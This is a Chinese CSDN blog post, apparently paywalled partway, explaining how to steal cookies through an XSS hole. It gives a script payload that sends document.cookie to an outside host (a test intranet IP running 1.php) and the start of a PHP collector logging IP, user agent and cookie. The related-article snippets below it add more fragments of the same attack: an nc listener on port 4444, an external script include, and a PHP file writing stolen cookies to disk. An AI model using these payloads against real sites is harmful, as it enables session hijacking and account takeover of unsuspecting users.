利用XSS来将cookie传送指定文件中

最新推荐文章于 2023-05-19 08:26:06 发布
VIP文章 最新推荐文章于 2023-05-19 08:26:06 发布
阅读量819 收藏
点赞数
分类专栏: Security 文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/u010726042/article/details/78070301
版权

题目可以说是很直白了,为什么突然写这个,还来源于前几天的面试,今年的校招因为一些公司的缩招,可以说是泥潭之争了,当然了,被面试官蹂躏也是自身水平和能力的限制,没有任何怨言。在面试官让我手写xss利用代码的时候,我才发现,因为一直以来的乙方的惯性思维,在漏洞利用和脚本上自己的实践太少了,但是还好,我还有很长很长的时间,可以努力。

在存在XSS漏洞的输入框中输入(IP地址为测试内网地址):

<script>document.location=http://10.170.61.174/1.php?cookie=document.cookie</script>

这里可以用document.location或者window.open, <script src="">来调用。但是调用后都会导致跳转,不知道还有什么其他好用的调用方法。突然想起来beEF,一次访问就可以hook,真的强。

1.php如下,放在web服务器的根目录:

<?php
$ip=$_SERVER['REMOTE_ADDR'];
//$referer=$_SERVER['HTTP_REFERER'];
$agent=$_SERVER['HTTP_USER_AGENT'];
$cookie = $_GET['cookie'];
$data =
最低0.47元/天 解锁文章
Q1n6
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
JS写XSS cookie stealer来窃取密码的步骤详解
10-18
JavaScript是web最常用的脚本开发语言,js可以自动执行站点组件,管理站点内容,在web业内实现其他有用的函数。这篇文章主要介绍了JS写XSS cookie stealer来窃取密码的步骤详解,需要的朋友可以参考下
3-5通过XSS获取cookie以及XSS后台管理系统的使用
山兔的博客
04-23 3808
XSS漏洞测试:cookie获取和钓鱼攻击演示  XSS漏洞测试:cookie的窃取和利用 同时讲到get型xss利用,post型xss利用XSS漏洞测试:钓鱼攻击  XSS漏洞测试:xss获取用户键盘记录 让大家更好的理解xss的危害以及原理 案例1:xss如何获取cookie? GET型XSS利用cookie获取 pkxss管理后台使用介绍 在源码包里面,有一个pkxss,我们可以把这个目录,单独的放在某个目录下面,这个东西其实是一个可以独立使用的后台,我们可以单独的把他放在站点目录下
XSS详解及其利用方式
藤宫博也的博客
11-14 3776
XSS-xss
技巧:XSS漏洞结合nc窃取Cookie实现免密码登录
weixin_51339377的博客
04-18 1864
XSS漏洞结合nc窃取Cookie实现免密码登录(已亲身通过burp抓包改Cookie在不同电脑实践成功!) 如果某天不能用外网,也不能用kali 存储型xss最重要的是获取用户的cookie!!!!!!!!!! document.cookie 获取用户所在网站的cookie 1.在黑客端用nc进行监听 nc -lvp 4444 //使用nc监听4444端口 2.XSS注入的恶意script脚本 <script>var img = docum...
【转】XSS获取cookie的一种手段
mastergu2的博客
08-09 288
以往只是知道xss是用来弹窗的,但是作为一种危险的漏洞,它到底有什么危害呢,今天我见识了一下,感觉很强,于是在这转载一下。 原文:https://www.cnblogs.com/chyingp/archive/2013/06/06/zcool-xss.html 首先分析了下站酷的页面表现神马的,发现它是将用户输入脚本直接输出到页面,那就好办了,果断输入如下内容: <script src="http://saintcoder.duapp.com/joke/joke.js"></script&
XSS实现cookie盗取
一期一会的博客
04-08 989
XSS实现cookie盗取 在一台win7上搭建xss,另外一台搭建留言板(一个网站),两台虚拟机之间能够ping通,在留言板上留言,管理员回复留言,xss上获取到cookie,利用国菜刀通过获取的cookie用管理员账号登录。 实验环境: ​ Windows 7 192.168.1.128 (搭建xss) ​ Windows 7 192.168.1.100 (安装小旋风) xss平台搭建好以后,进入管理员账户,复制邀请码,退出登录,利用邀请码重新注册一个test11的账户
XSS平台打cookie实战
m0_74989372的博客
05-05 394
xss平台的使用及xss漏洞的利用
关于pdf文件xss攻击问题,配置xssFilter方法
最新发布
12-21
所有需要的文件均在里面,超有所值
第十四节 IE利用CSS触发XSS-01
09-15
第十四节 IE利用CSS触发XSS-01
XSS获取cookie利用方式 (ASP版).txt
12-22
XSS获取cookie利用方式简单方法
Web高级知识-跨域&XSS;&CSRF;解决方案
11-26
http长连接与短连接 HTTP协议与TCP/IP协议的关系 HTTP的长连接和短连接本质上是TCP长连接和短连接。HTTP属于应用层协议,在传输层使用TCP协议,在网络层使用IP协议。IP协议主要解决网络路由和寻址问题,TCP协议主要解决如何在IP层之上可靠的传递数据包,使在网络上的另一端收到发端发出的所有包,并且顺序与发出顺序一致。TCP有可靠,面向连接的特点。 如何理解HTTP协议是无状态的 HTTP协议是无状态的,指的是协议对于事务处理没有记忆能力,服务器不知道客户端是什么状态。也就是说,打开一个服务器上的网页和你之前打开这个服务器上的网页之间没有任何联系。HTTP是一个无状态的面向连接的协议,无状态不代表HTTP不能保持TCP连接,更不能代表HTTP使用的是UDP协议(无连接)。 跨域实战解决方案 跨域原因产生:在当前域名请求网站,默认不允许通过ajax请求发送其他域名。
Java防止xss攻击附相关文件下载
08-25
首先说一下思路,防止这种类似于注入攻击,就是使用拦截器(Filter)处理特殊字符或过滤特殊字符 今天介绍一个方法,利用覆盖Servlet的getParameter方法达到处理特殊字符的目的来解决(防止)Xss攻击 web.xml,需要的...
[网络安全]XSSCookie外带攻击姿势及例题详析(基于DVWA靶场)
等风来
05-19 6572
XSSCookie 外带攻击就是一种针对 Web 应用程序XSS(跨站脚本攻击)漏洞进行的攻击,攻击者通过在 XSS 攻击注入恶意脚本,从而窃取用户的 Cookie 信息。攻击者通常会利用已经存在的 XSS 漏洞,在受害者的浏览器上注入恶意代码,并将受害者的 Cookie 数据上传到攻击者控制的服务器上,然后攻击者就可以使用该 Cookie 来冒充受害者,执行一些恶意操作,例如盗取用户的账户信息、发起钓鱼攻击等。
简单xss接收cookie平台的搭建以及xsscookie的一些总结
..
01-27 3698
接收平台的搭建_BlueLotus_XSSReceiver 这个是搭建教程: 打Cookie小工具_BlueLotus_XSSReceiver 链接:百度网盘 请输入提取码提取码:tdoj 我是将其搭在服务器上,模拟最真实的攻击环境。搭在服务器上需要几个条件,一是得有apache服务,二是得有php环境。 Linux环境搭建:CentOs + Apache + MySQL + PHP - 云+社区 - 腾讯云 下面说一下在搭建过程踩的坑。 一、在上传的时候直接上传解压好的_Blue...
ctf xss利用_利用存储型XSS跨站漏洞偷取用户Cookie实战
weixin_42611310的博客
02-23 1539
声明 :严禁读者利用以下介绍知识点对网站进行非法操作 , 本文仅用于技术交流和学习 , 如果您利用文章介绍的知识对他人造成损失 , 后果由您自行承担 , 如果您不能同意该约定 , 请您务必不要阅读该文章 , 感谢您的配合 !攻击者要偷取Cookie , 就要让他们精心构造的恶意代码在受害者的计算机上运行 , 一般来说 , 是在用户访问一个网页的时候执行一段JavaScript代码 , 这段代码会...
XSS和跨域请求
qq_48829044的博客
06-19 1051
XSS与同源策略
CSRF(跨域请求伪造)和XSS(跨域脚本攻击)的概念和防范措施
tscn1的博客
03-22 989
这里写目录标题CSRF(跨域请求伪造)原理:防御cookie的sameSite验证referer和Origin二次验证使用非cookie令牌XSS(跨域脚本攻击)存储型XSS反射型DOM型 CSRF(跨域请求伪造) 恶意网站以正常用户为媒介,通过模拟正常用户的操作,攻击其登录过的网站。 原理: 1. 正常用户登录后,获得正常站点的令牌,以cookie的形式保存。 2. 用户访问恶意站点,恶意站点通过某种形式去请求了正常网站,然后将用户的令牌传递到正常网站,完成攻击。 防御 cookie的sameSite
XSS漏洞利用——获取cookie
cxrpty的博客
02-20 1649
实验环境:DVWA 实验步骤: 一、在服务器创建一个1.php文件获取cookie值,并将cookie值写入1.txt php代码如下: <?php $file=fopen("1.txt","a"); if($_GET['cookie']){ $cookie=$_GET['cookie']; fputs($file,"$cookie\r\n"); } ?> ...
XSS (跨站脚本攻击) 分析与实战
未完成的歌~的博客
01-14 5087
文章目录一、漏洞原理1、XSS简介:2、XSS原理解析:3、XSS的分类:3.1、反射型XSS3.2、存储型XSS3.3、DOM型XSS二、靶场实战XSS实现盗取管理员Cookie并登录: 一、漏洞原理 1、XSS简介: XSS全称:Cross Site Scripting,即跨站脚本攻击,为了不和“层叠样式表”(Cascading Style Sheets, CSS)的缩写混淆,故将跨站脚本攻击缩写为XSSXSS是最常见的 Web 应用程序安全漏洞之一,这类漏洞能够使攻击者嵌入恶意脚本代码(一般是JS代
怎样利用XSS跨站攻击对Cookie验证进行欺骗?
06-05
2. 在Cookie设置HttpOnly属性,避免JavaScript读取Cookie信息。 3. 在服务器端对用户提交的Cookie信息进行校验,例如校验Cookie的有效期、校验Cookie的内容等。 4. 使用CSRF Token对Cookie进行保护,避免攻击者...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值